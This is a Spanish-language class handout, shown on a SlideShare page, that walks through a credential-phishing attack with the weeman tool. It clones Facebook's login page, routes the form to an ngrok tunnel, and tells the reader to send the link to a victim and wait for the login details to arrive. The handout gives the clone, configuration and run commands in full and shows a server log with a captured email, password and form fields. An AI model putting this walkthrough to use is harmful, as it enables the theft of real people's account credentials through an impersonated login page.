SlideShare une entreprise Scribd logo
1  sur  4
Bien para esta clase vamos a utilizar otro repositorio de git.
Esta herramienta se llama weeman, sirve para clonar sitios que contengan login de acceso con
usuario email y contraseña.
Es importante aclararles que también utiliza a ngrok para realizar el ataque fuera de la red
local.
En el ejemplo vamos a utilizar Facebook como práctica.
Vamos a comenzar descargando la herramienta clonándola desde git.
root@computaxion:~/tools# git clone https://github.com/samyoyo/weeman.git
Una vez descargada la herramienta vamos a sitio donde se descargó.
root@computaxion:~/tools# ls
Armitage Evil-Droid ngrok Phisher-man weeman
root@computaxion:~/tools# cd weeman/
root@computaxion:~/tools/weeman# ls
Al listar nos encontramos con el archivo weeman.py, lo ejecutaos con el siguiente comando.
Python weeman.py
Core LICENSE README.md weeman.py
root@computaxion:~/tools/weeman# python weeman.py
Al iniciar weeman, utilizamos el comando help para ver las opciones que nos brinda.
(Weeman): help
show : show default settings.///// show: muestra la configuración predeterminada.
Set: set settings (set port 80). ////// set: establece la configuración (establece el Puerto
80)
Run : start the server. /////run inicia el servidor.
Clear: clear screen.///// clear limpia la pantalla
Help : show help. ///muestra ayuda
Quit : bye bye. //// Cierra
(Weeman): show
---------------------------
URL : http://localhost
Port : 8080
accion_url: http://localhost/login
User agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.
36 (KHTML, liqk Gecko) Chrome/41.0.2227.0 Safari/537.36
Bien como vemos trae por defecto algunas configuraciones, se las vamos a cambiar por las
nuestras. Con el comando SET
---------------------------
(weeman ) : set url https://facebook.com
(weeman ) : set action_url https://0d44dac1.ngrok.io
(weeman ) : set port 8080
(weeman ) : run
Como vieron en el parámetro url le colocamos la de Facebook, en la accion_url le colocamos la
que nos brinda ngrok y en el puerto le colocamos el 8080, finalmente le damos inicio con el
comando run.
Ahora le enviamos el enlace a la víctima y esperamos que nos lleguen las credenciales de
acceso.
[00:09:44] Trying to get https://facebook.com ...
[00:09:44] Downloadng wepage ...
[00:09:49] Modifying the HTML file ...
[00:09:49] the HTML page will redirect to ref.html ...
[00:09:49] Starting Weeman 1.3 server on 0.0.0.0:8080
[00:10:48] Connected : localhost
[00:10:48] localhost - sent GET request without parameters.
[00:10:52] Connected : localhost
[00:10:52] Connected : localhost
[00:10:52] Connected : localhost
[00:10:52] Connected : localhost
[00:10:57] localhost - sent POST request.
[00:10:57] Something wrong: (too many values to unpack) igonring ...
[00:10:58] localhost - sent POST request.
[00:10:58] Something wrong: (too many values to unpack) igonring ...
[00:11:00] localhost - sent POST request.
[00:11:00] Something wrong: (too many values to unpack) igonring ...
[00:11:13] localhost - sent POST request.
[00:11:13] Something wrong: (too many values to unpack) igonring ...
[00:11:16] localhost - sent POST request.
[00:11:16] Something wrong: (too many values to unpack) igonring ...
[00:11:22] localhost - sent POST request.
[00:11:22] jazoest => 2668
[00:11:22] lsd => AVr__HHE
[00:11:22] email => 123@gmail.com
[00:11:22] pass => 1234566
[00:11:22] timezone => 300
[00:11:22] lgndim => eyJ3IjoxMzY2LCJoIjo3MTIsImF3IjoxMzY2LCJhaCI6NjgxLCJjIjoyNH0=
[00:11:22] lgnrnd => 210942_WNvY
[00:11:22] lgnjs => 1581570651
[00:11:22] ab_test_data =>
AAAAAAAA//A///A/AAAAAA/AAAAAAA/AAAAAAAAAZyyl/AZAAAEFAB
[00:11:22] locale => es_LA
[00:11:22] next => https://www.facebook.com/
[00:11:22] login_source => login_bluebar
[00:11:22] guid => f186c5db5f7cfe4
[00:11:22] skstamp =>
eyJoYXNoIjoiZWM3NDRjY2EzOTY1MTAxYTM2OTRiYTE1MWY0ZTI5OWYiLCJoYXNoMiI6ImMxYz
dkMzhiZWQ3NWYzNmY1MGFkZGZkZmFlMGVkODVlIiwi
cm91bmRzIjo1LCJzZWVkIjoiNGQ2NTJmNTRjMjQ2MWEzNTY1YzFiNTc3NDE0NGQ5Y2EiL
CJzZWVkMiI6IjZlMTQ2ZDNmMDZjMWI4MmNiYjgyZWQ2NjhhOTBlZjJiIiwidGltZV90YW
tlbiI6NDU2MDAwLCJzdXJmYWNlIjoibG9naW4ifQ==

Contenu connexe

Similaire à 1.1 phishing con weeman.docx

Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Configuracion de proxy squid en centos
Configuracion de proxy squid en centosConfiguracion de proxy squid en centos
Configuracion de proxy squid en centosmurilloyair
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografiaJosé Moreno
 
Publicación de un Servidor Web a través de un Módem Doméstico.
Publicación de un Servidor Web a través de un Módem Doméstico.Publicación de un Servidor Web a través de un Módem Doméstico.
Publicación de un Servidor Web a través de un Módem Doméstico.Gerardo Martínez
 
Instalación de Tomcat 7 en Linux y Windows
Instalación de Tomcat 7 en Linux y WindowsInstalación de Tomcat 7 en Linux y Windows
Instalación de Tomcat 7 en Linux y Windowspablolp
 
practica 1 apache
practica 1 apachepractica 1 apache
practica 1 apachecaoxman
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocinaEfren Diaz Gomez
 
Write up desafio 20 eset
Write up desafio 20 esetWrite up desafio 20 eset
Write up desafio 20 esetjeysonh
 
Receta red social
Receta red socialReceta red social
Receta red socialwalterose7
 
Maitaining access
Maitaining accessMaitaining access
Maitaining accessTensor
 
Uso del troyano cybergate
Uso del troyano cybergateUso del troyano cybergate
Uso del troyano cybergateTensor
 
Edr andrade.v.p ablo.a_guerra_veintimilla_hamachi
Edr andrade.v.p ablo.a_guerra_veintimilla_hamachiEdr andrade.v.p ablo.a_guerra_veintimilla_hamachi
Edr andrade.v.p ablo.a_guerra_veintimilla_hamachiAlejandro Andrade
 
Práctica de Creación de Máquina Virtual con LAMP en Amazon Web Services
Práctica de Creación de Máquina Virtual con LAMP en Amazon Web ServicesPráctica de Creación de Máquina Virtual con LAMP en Amazon Web Services
Práctica de Creación de Máquina Virtual con LAMP en Amazon Web ServicesHéctor Garduño Real
 
Introduccion al hacking con SET.
Introduccion al hacking con SET.Introduccion al hacking con SET.
Introduccion al hacking con SET.Michael Sanchez
 

Similaire à 1.1 phishing con weeman.docx (20)

Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Team.docx
Team.docxTeam.docx
Team.docx
 
Configuracion de proxy squid en centos
Configuracion de proxy squid en centosConfiguracion de proxy squid en centos
Configuracion de proxy squid en centos
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Lab 3 cifrado criptografia
Lab 3   cifrado criptografiaLab 3   cifrado criptografia
Lab 3 cifrado criptografia
 
Publicación de un Servidor Web a través de un Módem Doméstico.
Publicación de un Servidor Web a través de un Módem Doméstico.Publicación de un Servidor Web a través de un Módem Doméstico.
Publicación de un Servidor Web a través de un Módem Doméstico.
 
Instalación de Tomcat 7 en Linux y Windows
Instalación de Tomcat 7 en Linux y WindowsInstalación de Tomcat 7 en Linux y Windows
Instalación de Tomcat 7 en Linux y Windows
 
practica 1 apache
practica 1 apachepractica 1 apache
practica 1 apache
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
 
Write up desafio 20 eset
Write up desafio 20 esetWrite up desafio 20 eset
Write up desafio 20 eset
 
Ft py ssh_fco_javier_mejías_fernández
Ft py ssh_fco_javier_mejías_fernándezFt py ssh_fco_javier_mejías_fernández
Ft py ssh_fco_javier_mejías_fernández
 
Receta red social
Receta red socialReceta red social
Receta red social
 
Maitaining access
Maitaining accessMaitaining access
Maitaining access
 
Symfony Parte 2
Symfony Parte 2Symfony Parte 2
Symfony Parte 2
 
Uso del troyano cybergate
Uso del troyano cybergateUso del troyano cybergate
Uso del troyano cybergate
 
Edr andrade.v.p ablo.a_guerra_veintimilla_hamachi
Edr andrade.v.p ablo.a_guerra_veintimilla_hamachiEdr andrade.v.p ablo.a_guerra_veintimilla_hamachi
Edr andrade.v.p ablo.a_guerra_veintimilla_hamachi
 
Cherokee
CherokeeCherokee
Cherokee
 
Práctica de Creación de Máquina Virtual con LAMP en Amazon Web Services
Práctica de Creación de Máquina Virtual con LAMP en Amazon Web ServicesPráctica de Creación de Máquina Virtual con LAMP en Amazon Web Services
Práctica de Creación de Máquina Virtual con LAMP en Amazon Web Services
 
Practicas hackx crack_06
Practicas hackx crack_06Practicas hackx crack_06
Practicas hackx crack_06
 
Introduccion al hacking con SET.
Introduccion al hacking con SET.Introduccion al hacking con SET.
Introduccion al hacking con SET.
 

Dernier

P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...danielpoza1
 
Presentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la WebPresentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la Webfernandalunag19
 
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...CENECOnline
 
Mapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptxMapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptxjose880240
 
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdfAntenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdfperezreyesalberto10
 
Emprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoEmprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoCENECOnline
 
tabla-bacterias-1-0-179241-downloadable-3772106.pdf
tabla-bacterias-1-0-179241-downloadable-3772106.pdftabla-bacterias-1-0-179241-downloadable-3772106.pdf
tabla-bacterias-1-0-179241-downloadable-3772106.pdfssuser58a6321
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadJonathanHctorSilvaRo
 

Dernier (8)

P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
 
Presentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la WebPresentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la Web
 
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
¡Descubre el Poder del Masaje Holístico en nuestra Primera Sesión del Seminar...
 
Mapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptxMapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptx
 
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdfAntenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
 
Emprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoEmprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC Mexico
 
tabla-bacterias-1-0-179241-downloadable-3772106.pdf
tabla-bacterias-1-0-179241-downloadable-3772106.pdftabla-bacterias-1-0-179241-downloadable-3772106.pdf
tabla-bacterias-1-0-179241-downloadable-3772106.pdf
 
Corte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuadCorte de luz 2024 Guayaquil Guayas ecuad
Corte de luz 2024 Guayaquil Guayas ecuad
 

1.1 phishing con weeman.docx

  • 1. Bien para esta clase vamos a utilizar otro repositorio de git. Esta herramienta se llama weeman, sirve para clonar sitios que contengan login de acceso con usuario email y contraseña. Es importante aclararles que también utiliza a ngrok para realizar el ataque fuera de la red local. En el ejemplo vamos a utilizar Facebook como práctica. Vamos a comenzar descargando la herramienta clonándola desde git. root@computaxion:~/tools# git clone https://github.com/samyoyo/weeman.git Una vez descargada la herramienta vamos a sitio donde se descargó. root@computaxion:~/tools# ls Armitage Evil-Droid ngrok Phisher-man weeman root@computaxion:~/tools# cd weeman/ root@computaxion:~/tools/weeman# ls Al listar nos encontramos con el archivo weeman.py, lo ejecutaos con el siguiente comando. Python weeman.py Core LICENSE README.md weeman.py root@computaxion:~/tools/weeman# python weeman.py Al iniciar weeman, utilizamos el comando help para ver las opciones que nos brinda. (Weeman): help
  • 2. show : show default settings.///// show: muestra la configuración predeterminada. Set: set settings (set port 80). ////// set: establece la configuración (establece el Puerto 80) Run : start the server. /////run inicia el servidor. Clear: clear screen.///// clear limpia la pantalla Help : show help. ///muestra ayuda Quit : bye bye. //// Cierra (Weeman): show --------------------------- URL : http://localhost Port : 8080 accion_url: http://localhost/login User agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537. 36 (KHTML, liqk Gecko) Chrome/41.0.2227.0 Safari/537.36 Bien como vemos trae por defecto algunas configuraciones, se las vamos a cambiar por las nuestras. Con el comando SET --------------------------- (weeman ) : set url https://facebook.com (weeman ) : set action_url https://0d44dac1.ngrok.io (weeman ) : set port 8080 (weeman ) : run Como vieron en el parámetro url le colocamos la de Facebook, en la accion_url le colocamos la que nos brinda ngrok y en el puerto le colocamos el 8080, finalmente le damos inicio con el comando run. Ahora le enviamos el enlace a la víctima y esperamos que nos lleguen las credenciales de acceso.
  • 3. [00:09:44] Trying to get https://facebook.com ... [00:09:44] Downloadng wepage ... [00:09:49] Modifying the HTML file ... [00:09:49] the HTML page will redirect to ref.html ... [00:09:49] Starting Weeman 1.3 server on 0.0.0.0:8080 [00:10:48] Connected : localhost [00:10:48] localhost - sent GET request without parameters. [00:10:52] Connected : localhost [00:10:52] Connected : localhost [00:10:52] Connected : localhost [00:10:52] Connected : localhost [00:10:57] localhost - sent POST request. [00:10:57] Something wrong: (too many values to unpack) igonring ... [00:10:58] localhost - sent POST request. [00:10:58] Something wrong: (too many values to unpack) igonring ... [00:11:00] localhost - sent POST request. [00:11:00] Something wrong: (too many values to unpack) igonring ... [00:11:13] localhost - sent POST request. [00:11:13] Something wrong: (too many values to unpack) igonring ... [00:11:16] localhost - sent POST request. [00:11:16] Something wrong: (too many values to unpack) igonring ... [00:11:22] localhost - sent POST request. [00:11:22] jazoest => 2668 [00:11:22] lsd => AVr__HHE [00:11:22] email => 123@gmail.com [00:11:22] pass => 1234566 [00:11:22] timezone => 300 [00:11:22] lgndim => eyJ3IjoxMzY2LCJoIjo3MTIsImF3IjoxMzY2LCJhaCI6NjgxLCJjIjoyNH0= [00:11:22] lgnrnd => 210942_WNvY [00:11:22] lgnjs => 1581570651
  • 4. [00:11:22] ab_test_data => AAAAAAAA//A///A/AAAAAA/AAAAAAA/AAAAAAAAAZyyl/AZAAAEFAB [00:11:22] locale => es_LA [00:11:22] next => https://www.facebook.com/ [00:11:22] login_source => login_bluebar [00:11:22] guid => f186c5db5f7cfe4 [00:11:22] skstamp => eyJoYXNoIjoiZWM3NDRjY2EzOTY1MTAxYTM2OTRiYTE1MWY0ZTI5OWYiLCJoYXNoMiI6ImMxYz dkMzhiZWQ3NWYzNmY1MGFkZGZkZmFlMGVkODVlIiwi cm91bmRzIjo1LCJzZWVkIjoiNGQ2NTJmNTRjMjQ2MWEzNTY1YzFiNTc3NDE0NGQ5Y2EiL CJzZWVkMiI6IjZlMTQ2ZDNmMDZjMWI4MmNiYjgyZWQ2NjhhOTBlZjJiIiwidGltZV90YW tlbiI6NDU2MDAwLCJzdXJmYWNlIjoibG9naW4ifQ==